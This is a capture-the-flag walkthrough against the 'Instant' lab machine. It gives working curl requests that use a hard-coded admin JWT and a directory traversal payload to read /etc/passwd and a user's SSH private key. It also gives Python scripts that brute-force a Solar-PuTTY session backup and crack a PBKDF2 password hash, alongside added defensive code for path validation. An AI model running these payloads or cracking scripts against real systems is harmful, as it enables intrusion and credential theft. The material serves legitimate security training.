Linux Penetration Practice: Instant
Word count: 980  2025-08-22 12:23:19
Linux Penetration Practice: Instant Target Machine Walkthrough
1. Information Gathering
1.1 Initial scan
Run a fast full-port TCP connect scan with nmap:
nmap -sT --min-rate 10000 -p- 10.10.11.37
Open ports found:
- 22/tcp (SSH)
- 80/tcp (HTTP)
- a number of filtered ports
1.2 Detailed scan
Run a version, default-script and OS detection scan against the two open ports:
nmap -sTVC -O -p22,80 10.10.11.37
Findings:
- OpenSSH 9.6p1 Ubuntu
- Apache httpd 2.4.58 (Ubuntu)
- Site title "Instant Wallet"
2. Web Application Analysis
2.1 Visiting the site
Port 80 serves a page with a download link that hands out the file instant.apk. The hostname instant.htb used below needs an /etc/hosts entry pointing at 10.10.11.37.
2.2 Directory and virtual-host brute-forcing
Use gobuster for directories and ffuf for subdomains (fuzzing the Host header):
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://instant.htb/
ffuf -c -w /usr/share/wordlists/amass/subdomains-top1mil-110000.txt -u 'http://instant.htb' -H "Host: FUZZ.instant.htb"
Neither turns up anything useful.
3. APK Analysis
3.1 Unpacking with apktool
apktool d instant.apk
3.2 Searching for useful strings
Search the decoded output for anything that references the target domain:
grep -R -i instant.htb ./
Findings:
- support@instant.htb
- mywalletv1.instant.htb
- swagger-ui.instant.htb
Add the two new subdomains to /etc/hosts as well; swagger-ui.instant.htb exposes the API documentation used in the next section.
4. Using the Swagger API
4.1 Register a user
curl -X POST "http://swagger-ui.instant.htb/api/v1/register" \
-H "accept: application/json" \
-H "Content-Type: application/json" \
-d "{ \"email\": \"string@qq.com\", \"password\": \"redteam\", \"pin\": \"12345\", \"username\": \"redteam\"}"
4.2 Log in to obtain a token
curl -X POST "http://swagger-ui.instant.htb/api/v1/login" \
-H "accept: application/json" \
-H "Content-Type: application/json" \
-d "{ \"password\": \"redteam\", \"username\": \"redteam\"}"
The login response returns an API token for the newly registered user, who has no admin rights.
4.3 Extract the admin token from the APK
Searching the decoded APK for "authorizations" reveals a hard-coded admin token (a JWT, sent later as the raw value of the Authorization header):
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA
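Before using a token pulled out of an APK, inspect what it claims. The following is an added example, not code from the write-up: it decodes the token above without verifying the signature (we do not hold the server's HMAC secret), reports the role and the expiry, and computes the expiry with plain epoch arithmetic so that it works even for timestamps far beyond what the platform's localtime conversion accepts.

```python
import base64
import json
from datetime import datetime, timedelta, timezone

# The admin token recovered from the APK (copied from the write-up above).
ADMIN_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0w"
    "MTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ."
    "v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA"
)


def b64url_decode(segment: str) -> bytes:
    """Decode one base64url segment, restoring the '=' padding that JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_unverified(token: str):
    """Return (header, claims, signature_bytes) WITHOUT checking the signature.

    This only inspects the token. Whether the server accepts it is decided by
    its HMAC check with a secret we do not have, so nothing here proves validity.
    """
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS: expected three dot-separated segments")
    header = json.loads(b64url_decode(parts[0]))
    claims = json.loads(b64url_decode(parts[1]))
    signature = b64url_decode(parts[2])
    return header, claims, signature


def claim_expiry(claims: dict) -> datetime:
    """Convert the numeric 'exp' claim to an aware UTC datetime via epoch arithmetic."""
    epoch = datetime(1970, 1, 1, tzinfo=timezone.utc)
    return epoch + timedelta(seconds=int(claims["exp"]))


def summarize(token: str) -> dict:
    """Collect the facts a tester wants to see before replaying a found token."""
    header, claims, signature = decode_jwt_unverified(token)
    exp = claim_expiry(claims)
    return {
        "alg": header.get("alg"),
        "id": claims.get("id"),
        "role": claims.get("role"),
        "walId": claims.get("walId"),
        "expires": exp.isoformat(),
        "years_until_expiry": exp.year - datetime.now(timezone.utc).year,
        "signature_bytes": len(signature),
    }


if __name__ == "__main__":
    for key, value in summarize(ADMIN_TOKEN).items():
        print(f"{key:>20}: {value}")
```

The claims say id 1 with role Admin and an exp in the year 3023, so the token is effectively permanent: a token that cannot expire and ships inside a client binary is the finding here, independent of the traversal bug it unlocks. The header's alg is HS256, meaning one shared secret signs every token; the write-up does not need it, but a weak secret would be brute-forceable offline from this token alone.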
5. Exploiting the Directory Traversal
The admin log-reading endpoint takes a file name in the log_file_name parameter and does not confine it to the log directory, so URL-encoded ../ sequences walk out to any file the service account can read.
5.1 Read /etc/passwd
curl -X GET "http://swagger-ui.instant.htb/api/v1/admin/read/log?log_file_name=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" \
-H "accept: application/json" \
-H "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA"
This reveals the user shirohige.
5.2 Read the SSH private key
curl -X GET "http://swagger-ui.instant.htb/api/v1/admin/read/log?log_file_name=..%2F..%2F..%2F..%2F..%2F..%2Fhome%2Fshirohige%2F.ssh%2Fid_rsa" \
-H "accept: application/json" \
-H "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA"
5.3 Recover the private key with awk
The response carries the key one quoted line at a time, each ending in an escaped \n, which is what this pipeline strips. With the response saved to a file named sou, the first awk keeps the text between the first pair of double quotes on each line and the second cuts at the backslash of the \n escape; ssh refuses a key that is group- or world-readable, so the permissions must be fixed as well:
cat sou | awk -F'"' '{print $2}' | awk -F'\\' '{print $1}' > id_rsa
chmod 600 id_rsa
Check the result and remove any lines before "-----BEGIN" or after "-----END" that are not part of the key.
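To make the bug in this section concrete, here is an added example of the vulnerable resolution pattern beside a hardened version. This is my illustration, not the Instant application's source (the write-up does not show it); the log directory /var/www/logs and the function names are assumptions for illustration.

```python
import os
from urllib.parse import unquote

# Hypothetical log directory; the real one is not shown in the write-up.
LOG_DIR = "/var/www/logs"


def vulnerable_log_path(base_dir: str, log_file_name: str) -> str:
    """The unsafe pattern: URL-decode the parameter and join it onto the log directory.

    os.path.join follows '..' without complaint and discards base_dir entirely when
    the name is absolute, so '..%2F..%2F..%2Fetc%2Fpasswd' resolves to /etc/passwd.
    """
    name = unquote(log_file_name)
    return os.path.normpath(os.path.join(base_dir, name))


def safe_log_path(base_dir: str, log_file_name: str) -> str:
    """Hardened resolution: accept only a bare file name that stays inside base_dir."""
    name = unquote(log_file_name)
    # 1. A log name must be a single path component: no separators, no '..', not absolute.
    if name in ("", ".", "..") or os.path.basename(name) != name:
        raise ValueError(f"rejected log name: {log_file_name!r}")
    # 2. Resolve symlinks and '..', then confirm the result is still under base_dir.
    #    This second check catches cases the first cannot see, e.g. a symlink in the directory.
    base_real = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base_real, name))
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise ValueError(f"path escapes log directory: {candidate}")
    return candidate


def is_traversal(base_dir: str, log_file_name: str) -> bool:
    """True when the hardened resolver rejects the name."""
    try:
        safe_log_path(base_dir, log_file_name)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    # Constructed requests: the payload from section 5.1, an absolute path, and a benign name.
    for param in ("..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd", "%2Fetc%2Fshadow", "app.log"):
        print(f"{param:45} vulnerable -> {vulnerable_log_path(LOG_DIR, param)}")
        verdict = "REJECTED" if is_traversal(LOG_DIR, param) else safe_log_path(LOG_DIR, param)
        print(f"{'':45} hardened   -> {verdict}")
```

Two checks are deliberate: the basename test rejects anything that is not a plain file name, and the realpath/commonpath test confirms the final path after symlink resolution, so neither a leading slash nor a symlink planted in the log directory gets past it. Running the endpoint as a dedicated low-privilege account would additionally have kept /home/shirohige/.ssh/id_rsa out of reach even with the bug present.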
6. SSH Access
Connect with the recovered key:
ssh shirohige@10.10.11.37 -i id_rsa
7. Privilege Escalation
7.1 Port forwarding
Two services listen only on localhost, on ports 8888 and 8808 (visible with ss -tlnp). Forward both over SSH so they can be reached from the attacking machine; a single session with two -L options is enough:
ssh shirohige@10.10.11.37 -i id_rsa -L 8888:127.0.0.1:8888 -L 8808:127.0.0.1:8808
7.2 Finding backup files
find / -name '*backup*' 2>/dev/null
This turns up a Solar-PuTTY session backup file.
7.3 Decrypting the Solar-PuTTY session
The export is a base64 blob from which the script below takes a salt and an IV, derives a Triple DES key from a passphrase with PBKDF2 (1000 iterations) and decrypts in CBC mode. It tries every line of a wordlist as the passphrase and prints the plaintext once the result contains "Credentials". It needs pycryptodome (pip install pycryptodome):
import base64
import sys
from Crypto.Cipher import DES3            # pycryptodome
from Crypto.Protocol.KDF import PBKDF2


def decrypt(passphrase, ciphertext):
    data = ''
    try:
        # Decode the base64 encoded ciphertext
        array = base64.b64decode(ciphertext)
        salt = array[:24]
        iv = array[24:32]
        encrypted_data = array[48:]
        # Derive the key using PBKDF2
        key = PBKDF2(passphrase, salt, dkLen=24, count=1000)
        # Create the Triple DES cipher in CBC mode
        cipher = DES3.new(key, DES3.MODE_CBC, iv)
        # Decrypt the data
        decrypted_data = cipher.decrypt(encrypted_data)
        # Remove padding (PKCS7 padding)
        padding_len = decrypted_data[-1]
        decrypted_data = decrypted_data[:-padding_len]
        # Keep only ASCII so a wrong passphrase yields garbage rather than an exception
        data = ''.join(chr(c) for c in decrypted_data if chr(c).isascii())
    except Exception as e:
        print(f'Error: {e}')
    return data


if len(sys.argv) < 3:
    print(f'Usage: {sys.argv[0]} putty_session.dat wordlist.txt')
    sys.exit(1)

with open(sys.argv[1]) as f:
    cipher = f.read().strip()

# rockyou.txt contains bytes that are not valid UTF-8; ignore them instead of crashing
with open(sys.argv[2], encoding='utf-8', errors='ignore') as passwords:
    for i, password in enumerate(passwords):
        password = password.strip()
        decrypted = decrypt(password, cipher)
        print(f'[{i}] {password=}', end='\r')
        if 'Credentials' in decrypted:
            print(f'\r[{i}] {password=}')
            print()
            print(decrypted)
            break
Run it:
python3 exp.py sessions-backup.dat /usr/share/wordlists/rockyou.txt
This yields the root credentials:
"Username":"root","Password":"12**24nzC!r0c%q12"
7.4 Cracking the database password hash
The application database holds a PBKDF2 hash in the format produced by Werkzeug's generate_password_hash, pbkdf2:<algorithm>:<iterations>$<salt>$<hex digest>, where the salt is used as its literal ASCII bytes:
pbkdf2:sha256:600000$I5bFyb0ZzD69pNX8$e9e4ea5c280e0766612295ab9bff32e5fa1de8f6cbb6586fab7ab7bc762bd978
The following script brute-forces it against a wordlist. Note that at 600,000 iterations every guess is expensive in pure Python; for a full rockyou.txt run hashcat (mode 10900, PBKDF2-HMAC-SHA256) is the practical tool.
import hashlib
import binascii


def pbkdf2_hash(password, salt, iterations=600000, dklen=32):
    # dklen is the digest length of SHA-256 (32 bytes), matching the 64 hex characters stored
    return hashlib.pbkdf2_hmac(
        'sha256',                      # hash algorithm
        password.encode('utf-8'),
        salt,
        iterations,
        dklen
    )


def find_matching_password(dictionary_file, target_hash, salt, iterations=600000, dklen=32):
    # Convert the target hash from a hex string to bytes
    target_hash_bytes = binascii.unhexlify(target_hash)
    # rockyou.txt contains bytes that are not valid UTF-8; ignore them instead of crashing
    with open(dictionary_file, 'r', encoding='utf-8', errors='ignore') as file:
        for line in file:
            password = line.rstrip('\r\n')  # strip only the line ending, keep the password intact
            hash_value = pbkdf2_hash(password, salt, iterations, dklen)
            if hash_value == target_hash_bytes:
                print(f"Found password: {password}")
                return password
    print("Password not found.")
    return None


# Parse the input: pbkdf2:sha256:600000$I5bFyb0ZzD69pNX8$e9e4...
# The salt is the literal string between the '$' signs. Werkzeug hashes it as
# salt.encode('utf-8'); base64-decoding it gives a different salt and no match can ever be found.
salt = b'I5bFyb0ZzD69pNX8'
target_hash = 'e9e4ea5c280e0766612295ab9bff32e5fa1de8f6cbb6586fab7ab7bc762bd978'
dictionary_file = '/usr/share/wordlists/rockyou.txt'  # wordlist path

# Run the dictionary attack
find_matching_password(dictionary_file, target_hash, salt)
8. Summary
- Initial reconnaissance found the web application and the APK download
- APK analysis revealed hidden subdomains and API endpoints
- Registering a user through the API gave basic access
- A hard-coded admin token in the APK provided privileged API access
- The directory traversal in the admin log endpoint exposed system files and an SSH private key
- The SSH private key gave the initial foothold as shirohige
- A Solar-PuTTY session backup found on the host was decrypted to recover the root credentials
- The database password hash was attacked with a PBKDF2 dictionary script
Key points:
- Reverse-engineering the APK was the breakthrough
- API endpoint discovery and abuse
- Directory traversal exploitation
- Solar-PuTTY session decryption
- PBKDF2 hash cracking